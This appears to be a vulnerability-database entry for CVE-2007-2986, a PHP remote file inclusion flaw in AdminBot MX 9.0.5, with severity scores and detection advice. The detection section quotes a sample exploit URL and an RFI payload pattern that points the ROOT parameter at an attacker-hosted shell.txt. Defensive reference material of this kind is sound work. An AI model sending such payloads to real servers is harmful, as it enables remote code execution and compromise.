cbcvebase.
CVE-2007-2986
published 2007-06-01

CVE-2007-2986: PHP remote file inclusion vulnerability in lib/live_status.lib.php in AdminBot MX 9.0.5 allows remote attackers to execute arbitrary PHP code via a URL in the…

PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
64.36%
99.1th percentile
PHP remote file inclusion vulnerability in lib/live_status.lib.php in AdminBot MX 9.0.5 allows remote attackers to execute arbitrary PHP code via a URL in the ROOT parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
nexenadminbot_mx

Detection & IOCsextracted from sources · hover to see the quote

pathlib/live_status.lib.php
commandhttp://127.0.0.1/[adminbot_path]/lib/live_status.lib.php?ROOT=shell.txt?
  • Monitor HTTP requests targeting lib/live_status.lib.php with a URL-like value in the ROOT parameter, which is the injection point for remote file inclusion.
  • Look for RFI payloads in the ROOT parameter that include a trailing '?' (null-byte/query-string terminator trick) to bypass file extension checks, e.g. ROOT=http://attacker/shell.txt?
  • ·Vulnerable component is AdminBot MX version 9.0.5 only; the ROOT parameter in live_status.lib.php is unsanitized and passed directly to a file-inclusion function.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.